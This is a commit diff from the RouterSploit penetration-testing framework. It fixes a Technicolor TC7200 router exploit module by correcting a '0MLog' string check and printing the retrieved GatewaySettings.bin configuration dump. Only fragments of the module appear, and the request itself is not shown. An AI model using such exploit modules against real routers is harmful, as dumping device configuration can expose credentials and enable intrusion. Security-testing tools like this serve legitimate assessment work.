Commit 910a710c by Marcin Bury

Fixing Technicolor TC7200 exploit.

parent 684612b2
...@@ -2,6 +2,8 @@ from routersploit import ( ...@@ -2,6 +2,8 @@ from routersploit import (
exploits, exploits,
print_success, print_success,
print_error, print_error,
print_info,
print_status,
http_request, http_request,
mute, mute,
validators, validators,
...@@ -40,7 +42,8 @@ class Exploit(exploits.Exploit): ...@@ -40,7 +42,8 @@ class Exploit(exploits.Exploit):
if response.status_code == 200 and "0MLog" in response.text: if response.status_code == 200 and "0MLog" in response.text:
print_success("Exploit success") print_success("Exploit success")
print r.text print_status("Reading GatewaySettings.bin...")
print_info(response.text)
else: else:
print_error("Exploit failed. Device seems to be not vulnerable.") print_error("Exploit failed. Device seems to be not vulnerable.")
...@@ -52,7 +55,7 @@ class Exploit(exploits.Exploit): ...@@ -52,7 +55,7 @@ class Exploit(exploits.Exploit):
if response is None: if response is None:
return False # target is not vulnerable return False # target is not vulnerable
if response.status_code == 200 and "0Mlog" in response.text: if response.status_code == 200 and "0MLog" in response.text:
return True # target is vulnerable return True # target is vulnerable
else: else:
return False # target is not vulnerable return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment